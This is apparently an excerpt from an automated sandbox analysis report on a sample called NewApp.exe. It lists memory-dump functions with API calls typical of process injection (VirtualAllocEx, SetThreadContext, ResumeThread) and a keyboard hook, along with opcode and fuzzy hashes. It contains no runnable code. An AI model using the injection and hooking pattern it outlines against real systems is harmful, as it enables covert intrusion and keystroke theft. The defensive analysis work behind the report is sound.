                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: d8a17ef08d386e0c23a11a6ed3a590571bce950f6888f407768377aaddd537dd
                                                      • Instruction ID: 59e51137af443f7e75c4c18f066403954f7eb4bcdfb0a63ec32aeb9371874a17
                                                      • Opcode Fuzzy Hash: d8a17ef08d386e0c23a11a6ed3a590571bce950f6888f407768377aaddd537dd
                                                      • Instruction Fuzzy Hash: 1D2115759002499FCB10CFA9C885BEEBBF5FF48324F108429E919A7740DB78A945CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 056324A2, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05632528
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 232938af9ca4c8e084964bdc9f65533cfde5052cfb6f81576dd54bdd2c811054
                                                      • Instruction ID: a8dfd3bec0303c7da00914a1571795f90001e62cc733dd4546f5703d3c918f1b
                                                      • Opcode Fuzzy Hash: 232938af9ca4c8e084964bdc9f65533cfde5052cfb6f81576dd54bdd2c811054
                                                      • Instruction Fuzzy Hash: D82136B19003099FCB10CFA9C891BEEBBF5FF48324F50842AE519A7740D778A905CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05631210, Relevance: 1.6, APIs: 1, Instructions: 64threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05631296
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 0d395d77a18897de6ca6cac1b54426970ed1a2c71fd5c25a255645c552aeeadf
                                                      • Instruction ID: 8d8c7a5a0282f56c0007262be29668fcadff53dd98ba15b6c445d56be3f7dcbc
                                                      • Opcode Fuzzy Hash: 0d395d77a18897de6ca6cac1b54426970ed1a2c71fd5c25a255645c552aeeadf
                                                      • Instruction Fuzzy Hash: AC2139B1D003099FDB10CFA9C5857EEBBF4AF48224F14842AD459B7741DB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05631218, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05631296
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 76c8a2233fb2781a9000805556c0059ca28fdc0fe3531d66083651cbb0f898da
                                                      • Instruction ID: fa5ff6a750c343485a525cc6f16f47b068041be19151e994becb51c740801fcc
                                                      • Opcode Fuzzy Hash: 76c8a2233fb2781a9000805556c0059ca28fdc0fe3531d66083651cbb0f898da
                                                      • Instruction Fuzzy Hash: 2E213871D002088FDB10DFA9C4857EEBBF4EF48224F14842ED419A7740CB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 056324A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05632528
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: c2c7c7926c13bcd846b5dbf7ddb8f2b45d13b7c497e0f369a6af8a8e1d331b6e
                                                      • Instruction ID: 2c357c9e814b0ebb2d3a71272f24545c5fb51c8797f5d67294eacac35c68b3e7
                                                      • Opcode Fuzzy Hash: c2c7c7926c13bcd846b5dbf7ddb8f2b45d13b7c497e0f369a6af8a8e1d331b6e
                                                      • Instruction Fuzzy Hash: 862116B18002499FCB10CFA9C895BEEBBF5FF48324F508429E519A7640D778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05633E60, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05633EDE
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: KernelObjectSecurity
                                                      • String ID:
                                                      • API String ID: 3015937269-0
                                                      • Opcode ID: 62ab0f465b5a3f3721e46b6efa562b8b73e7d3fd5b90940b810357162a7cfd0d
                                                      • Instruction ID: 70701d49c4e50edd750e167601f6b612bcf28b2b1fbfb1d25f6433b66cf96be3
                                                      • Opcode Fuzzy Hash: 62ab0f465b5a3f3721e46b6efa562b8b73e7d3fd5b90940b810357162a7cfd0d
                                                      • Instruction Fuzzy Hash: 3D21F9B19002099FCB10CF9AD485BDEBBF4EF48324F14842ED419A7740D778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05631EF2, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05631F66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 817c0de2e4ea76e223ffa97be24dd918c379f1606548523725a997c85b35abb4
                                                      • Instruction ID: b70b5fb324345e7b79e42074bc08de0d0c2a086eba3ea4a3af5f9b82a7e202b1
                                                      • Opcode Fuzzy Hash: 817c0de2e4ea76e223ffa97be24dd918c379f1606548523725a997c85b35abb4
                                                      • Instruction Fuzzy Hash: 191114729002499BCB10DFA9C845BDEBBF5EF48324F14881AE519A7750CB79A944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05631EF8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05631F66
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: adcea6448c5fdd65659b7a5ff9f9688711e820df229a2f6d5dd95dc64f3d0471
                                                      • Instruction ID: e9613f7bba0245749b7fb9a4735cf21112adb57427cca9afe5bd6ec545959f34
                                                      • Opcode Fuzzy Hash: adcea6448c5fdd65659b7a5ff9f9688711e820df229a2f6d5dd95dc64f3d0471
                                                      • Instruction Fuzzy Hash: 4711E2729002499BCB10DFA9C845BEEBBF5AB48324F14881AE519A7650CB79A944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05633010, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: d54f1533ba143a5ecb9bc07bca3fee8400f5c0ec21ad03f79c8b24fb92f9d4a5
                                                      • Instruction ID: 8a58eabaa126e6693682de1153cbe1e99952f958be8b5dd6af9604393b3eb239
                                                      • Opcode Fuzzy Hash: d54f1533ba143a5ecb9bc07bca3fee8400f5c0ec21ad03f79c8b24fb92f9d4a5
                                                      • Instruction Fuzzy Hash: F41146B1D002488FCB10CFA9C8457EEBBF4AF48228F148869C51AB7750CB78A944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05633018, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.850142493.0000000005630000.00000040.00000001.sdmp, Offset: 05630000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: c0a2e91f56deb30d5e35b8e9979bfb2a0fec2483833367f2b07058cef5d820b3
                                                      • Instruction ID: 2ae38bf23fe575192a27b55ea57f8946f1fa85db0749787675f50d25685b4371
                                                      • Opcode Fuzzy Hash: c0a2e91f56deb30d5e35b8e9979bfb2a0fec2483833367f2b07058cef5d820b3
                                                      • Instruction Fuzzy Hash: 35112871D002488BCB10DFA9C8457DEBBF4AB48224F148859D519A7750CB79A944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008ED4C8, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.813890414.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cac5ad7a44e90d2125f7b0824dbd3af7fb6757aa061e5a6c1d72137132532c18
                                                      • Instruction ID: a70c47d619f8926c63d789afed732a1e103026764d46eaa44a55bb2cd29c8fef
                                                      • Opcode Fuzzy Hash: cac5ad7a44e90d2125f7b0824dbd3af7fb6757aa061e5a6c1d72137132532c18
                                                      • Instruction Fuzzy Hash: BF2125B1504384EFDB11CF14D9C0B26BB65FB9932CF34856DE8098B246C336D84AC7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008ED114, Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.813890414.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 54edd45bd314e5037408cdef24e97c61e8a19f62accc31e4be6d1cfbfc642aa9
                                                      • Instruction ID: 6a74380f080b82a4cf44fa27487470c0623a012ccf3fdb83c9dfe2189d097da5
                                                      • Opcode Fuzzy Hash: 54edd45bd314e5037408cdef24e97c61e8a19f62accc31e4be6d1cfbfc642aa9
                                                      • Instruction Fuzzy Hash: C72103B5504384EFDB05CF11D8C0B26FB76FB85328F24856DE8098B646C336D84AD6A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008ED10F, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.813890414.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction ID: 5398c3429f9bf0d6b60b52927678d83df580e50eabeeae9e29a3741c34a268e9
                                                      • Opcode Fuzzy Hash: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction Fuzzy Hash: 5D11AF76404380DFDB15CF10D9C4B16FF72FB85324F2486A9D8454B656C336D85ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 008ED4C3, Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.813890414.00000000008ED000.00000040.00000001.sdmp, Offset: 008ED000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction ID: a20c7c6625c1c532158f0e277c519bbc6e7e9d17a1322ce6b014b88ac6ceb19f
                                                      • Opcode Fuzzy Hash: a092fcaee0eb3c0328143d559cad57c1e6d0db94b124d186dd8b2323946d1c30
                                                      • Instruction Fuzzy Hash: 6C11AF76404280DFDB11CF10D9C4B16BF71FB95324F24C6A9D8094B656C336D85ACBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: NewApp.exe PID: 6416 Parent PID: 2092 NewApp.exeCOMMON

                                                      Executed Functions

                                                      Function 06388460, Relevance: 1.8, APIs: 1, Instructions: 287libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: aa1eb37d12c6264aa97659e5f697b1a5906890df43be927cc897c114f3542018
                                                      • Instruction ID: 1a47684a7c5c096deb4e6b007f9a5f75f6b3bf9f47f86f440073d9ea4cc5aade
                                                      • Opcode Fuzzy Hash: aa1eb37d12c6264aa97659e5f697b1a5906890df43be927cc897c114f3542018
                                                      • Instruction Fuzzy Hash: FCB18D34B10319CFDB48EBA4D5546AEB7B6EF84308F60852AD102AB794DB74ED45CBC1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063890D0, Relevance: 1.7, APIs: 1, Instructions: 194libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0c9d3e9eb055c10f33cf5a022fc13238f1c4e3655ffbe97e23ba550c47c1bdd3
                                                      • Instruction ID: 9ce3dc07021d121dafed3d57f748b7a71165c9c0e05438763c8e462224ad4ab4
                                                      • Opcode Fuzzy Hash: 0c9d3e9eb055c10f33cf5a022fc13238f1c4e3655ffbe97e23ba550c47c1bdd3
                                                      • Instruction Fuzzy Hash: 5871D531B002059FCB44EFB8D9916AEB7BAFF85308F108569D5069F295DB70AD05CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063890CB, Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 024716a25aa51891a909bfc7fe8d846b89888d51ee7b0f700382a2153c334e15
                                                      • Instruction ID: 6a49d36595b534b8630739b0a5610c2c6bd4731251d60856eb26724af18732b1
                                                      • Opcode Fuzzy Hash: 024716a25aa51891a909bfc7fe8d846b89888d51ee7b0f700382a2153c334e15
                                                      • Instruction Fuzzy Hash: FB61C631B102159FDB44EFB8D851AEEB7BAAF85308F108529D5069F295DB709D05CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0643C37C, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0643D37B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID: HookWindows
                                                      • String ID:
                                                      • API String ID: 2559412058-0
                                                      • Opcode ID: 388b2d2539735dd5937a6e15d43fe64e791393892d96482341dda5d2cdcf6bbb
                                                      • Instruction ID: 3a81198e12bb73c724024800e6b8b21f7cc316380f9caa6479fe0cd5d3ea5cdb
                                                      • Opcode Fuzzy Hash: 388b2d2539735dd5937a6e15d43fe64e791393892d96482341dda5d2cdcf6bbb
                                                      • Instruction Fuzzy Hash: 962135B1D002189FCB50CF99D844BEEBBF5EF88324F14842AE459A7750CB74A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3A558, Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (TPZ
                                                      • API String ID: 0-510802719
                                                      • Opcode ID: 5f99b3f5c14a6a05d1cdf42e44cd09474c601af3148788ef28e16df71e8012de
                                                      • Instruction ID: a16598c5855061181bca533c3592e5734ecb281521739cad00cd0e2f9b26eaef
                                                      • Opcode Fuzzy Hash: 5f99b3f5c14a6a05d1cdf42e44cd09474c601af3148788ef28e16df71e8012de
                                                      • Instruction Fuzzy Hash: F8C1AC34B10105CFCB48DF68D985A9DB7B2EF89314B11846AE546EB365EF31EC06CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3A548, Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (TPZ
                                                      • API String ID: 0-510802719
                                                      • Opcode ID: 972d6d4d5efec1261072e2885d7a650095f00a9da0eed0c813efcd1e2d5045c2
                                                      • Instruction ID: 20a3648861a6dc18d611f5c143ebcb177a9fd16e90bf4e43074f9f5786c153cd
                                                      • Opcode Fuzzy Hash: 972d6d4d5efec1261072e2885d7a650095f00a9da0eed0c813efcd1e2d5045c2
                                                      • Instruction Fuzzy Hash: 19B19C34B10505CFCB48DF68D885A9DB7B2FF89314B1184AAE546EB361EB31EC46CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D30098, Relevance: .9, Instructions: 880COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6cfe3bfec9caacdf243d2d039d2b23689205934118e597f00e06b4bc8dd52e15
                                                      • Instruction ID: 425854e75e4bc1702627a49a03faf46e83fe9ed35448d3292afa69cd289ce0fa
                                                      • Opcode Fuzzy Hash: 6cfe3bfec9caacdf243d2d039d2b23689205934118e597f00e06b4bc8dd52e15
                                                      • Instruction Fuzzy Hash: 30824D34A04209DFCB14CF68D989AAEBBF2BF88315F15855AE446EB361D770ED41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3DAE0, Relevance: .3, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd3dda532c0de65c80f98a54651d8d2edf4de70d05896adca12dfdcb8f322b15
                                                      • Instruction ID: 2151559e071800f56e892c6a44c8cd4df2dd317d5a14a7697f69737d1535e315
                                                      • Opcode Fuzzy Hash: fd3dda532c0de65c80f98a54651d8d2edf4de70d05896adca12dfdcb8f322b15
                                                      • Instruction Fuzzy Hash: 41A1AE71B112188FCB14EFB8D4525AEBBB7EF84348F50842AD506EF355DB34AD468B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3DAD5, Relevance: .3, Instructions: 254COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a7027f75d3bb9bdb1f22a0b3c3514c6f19aae786f008a8d4de3909d66d0057b
                                                      • Instruction ID: 54dd024c82239673f08ca10a1cdc05ddff5bbe27fcbead37260673afe06e5691
                                                      • Opcode Fuzzy Hash: 8a7027f75d3bb9bdb1f22a0b3c3514c6f19aae786f008a8d4de3909d66d0057b
                                                      • Instruction Fuzzy Hash: 38919C71B102188FDB14EFB8D4525AEB7B7EF84348F50842AD506EF395DB34AD468BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3F4D8, Relevance: .2, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f21055167731fa42fa69a4a247000d6afd8e8205b18c7d4fac26af68b1b0d10
                                                      • Instruction ID: 861c186ef280503fe197026fde2fb2eb11a8a3c0a6abba36b0eef106fafc89e0
                                                      • Opcode Fuzzy Hash: 7f21055167731fa42fa69a4a247000d6afd8e8205b18c7d4fac26af68b1b0d10
                                                      • Instruction Fuzzy Hash: 2F712535F1020A9BCB04EF78E95256E7BB7EBC8214B50842AE506E7394DF389D018B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05D3F4E8, Relevance: .2, Instructions: 206COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.920408823.0000000005D30000.00000040.00000001.sdmp, Offset: 05D30000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ac85483d7446257da72e829081c81698da73750bc7c14a20db19c9547d1c17e7
                                                      • Instruction ID: 3e18d837756440a63a8eca90a7816eacdd6cf0864fbdebe168ee687159b8c067
                                                      • Opcode Fuzzy Hash: ac85483d7446257da72e829081c81698da73750bc7c14a20db19c9547d1c17e7
                                                      • Instruction Fuzzy Hash: DB711535F1010A9BCB48EF78E99256E77B7EBC8214F508426E506E73A4DF38DD058B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D25302, Relevance: 6.1, APIs: 4, Instructions: 145threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 04D253A0
                                                      • GetCurrentThread.KERNEL32 ref: 04D253DD
                                                      • GetCurrentProcess.KERNEL32 ref: 04D2541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 04D25473
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: d8bf32a9b60411427d3fd72d912495aca014a15438d4a5054de09a7f0d6945d7
                                                      • Instruction ID: 298973480155d9b44d98ec0f9ff55d4272f87de1d0a2476ae541789ac4451701
                                                      • Opcode Fuzzy Hash: d8bf32a9b60411427d3fd72d912495aca014a15438d4a5054de09a7f0d6945d7
                                                      • Instruction Fuzzy Hash: 8D51A9B48017489FDB01CFA9D549BDEBBF0EF48308F20809AE449A73A1D7746849CF22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D25340, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 04D253A0
                                                      • GetCurrentThread.KERNEL32 ref: 04D253DD
                                                      • GetCurrentProcess.KERNEL32 ref: 04D2541A
                                                      • GetCurrentThreadId.KERNEL32 ref: 04D25473
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0
                                                      • Opcode ID: d9fe3d7cdd23d6ab55445fda2c7c164dd4b16e549603ee76777528309d873e84
                                                      • Instruction ID: faa61ebb3d677fb52f1b51a1527ce0164f0e89487352cdc2b7ed7ca78b13186c
                                                      • Opcode Fuzzy Hash: d9fe3d7cdd23d6ab55445fda2c7c164dd4b16e549603ee76777528309d873e84
                                                      • Instruction Fuzzy Hash: F85144B49006499FDB15CFA9D648BDEBBF0EB88318F208459E409B7790C774A844CF62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 06435F48, Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924641329.0000000006430000.00000040.00000001.sdmp, Offset: 06430000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0316f7b8aa9f8aeb316d639b13ccd9bac3e594952ce388cdd36c147f68ab1a2
                                                      • Instruction ID: 939c2f9e05fca9e28dfe6a807f1532da48cde4d700262428b29bb2ea9fa300b0
                                                      • Opcode Fuzzy Hash: f0316f7b8aa9f8aeb316d639b13ccd9bac3e594952ce388cdd36c147f68ab1a2
                                                      • Instruction Fuzzy Hash: 12412472E043559FCB14CFA9C8046EEBBB5EF89224F15826BE408E7340DB789945CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D23A85, Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D23BA2
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: e8f933d5a9e472baaf3bc53aec301c9e0c0cce3ca785e5c3f0a1fad1e10df82c
                                                      • Instruction ID: 7e3f34220582e41814b4533556afbfbfafb479eb975e7d9c26ee4028c33ee23e
                                                      • Opcode Fuzzy Hash: e8f933d5a9e472baaf3bc53aec301c9e0c0cce3ca785e5c3f0a1fad1e10df82c
                                                      • Instruction Fuzzy Hash: 1051F2B5D00219AFDF15CFA9C980ADEBFB1FF48314F24816AE819AB210D775A845CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 063806F3, Relevance: 1.6, APIs: 1, Instructions: 120registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 06380809
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.924334917.0000000006380000.00000040.00000001.sdmp, Offset: 06380000, based on PE: false
                                                      Similarity
                                                      • API ID: QueryValue
                                                      • String ID:
                                                      • API String ID: 3660427363-0
                                                      • Opcode ID: 062002a4d3897434f965b573dd5fd2fb0caa4fa8602ca7ca2b229287ef6e2429
                                                      • Instruction ID: c66db50f7512b81b6d25af70beda2eec01ec7d9a2f264e7c5381920e073ebd7b
                                                      • Opcode Fuzzy Hash: 062002a4d3897434f965b573dd5fd2fb0caa4fa8602ca7ca2b229287ef6e2429
                                                      • Instruction Fuzzy Hash: AD416A71D053889FCB11DFA9C8806DEBFF4AF09310F1581AAE859EB251D734994ACFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D23A90, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D23BA2
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 6cd8abc93e4e5393d6dcb3ddb13707807a5b8e4188e514a3d21a4e9bc5b32e15
                                                      • Instruction ID: 5fa80d36f0a6fac48bb9e235872015f39f578d1f1eea7e3050b8ef123a52b16a
                                                      • Opcode Fuzzy Hash: 6cd8abc93e4e5393d6dcb3ddb13707807a5b8e4188e514a3d21a4e9bc5b32e15
                                                      • Instruction Fuzzy Hash: 8541D0B1D003599FDF14CFA9C984ADEBBB5FF48314F24822AE819AB210D774A845CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D26180, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D26959
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.918111394.0000000004D20000.00000040.00000001.sdmp, Offset: 04D20000, based on PE: false
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: 415971300a12689201828e8d1d21c1d3328cc480327ec65d1cc1df1749ae05a7
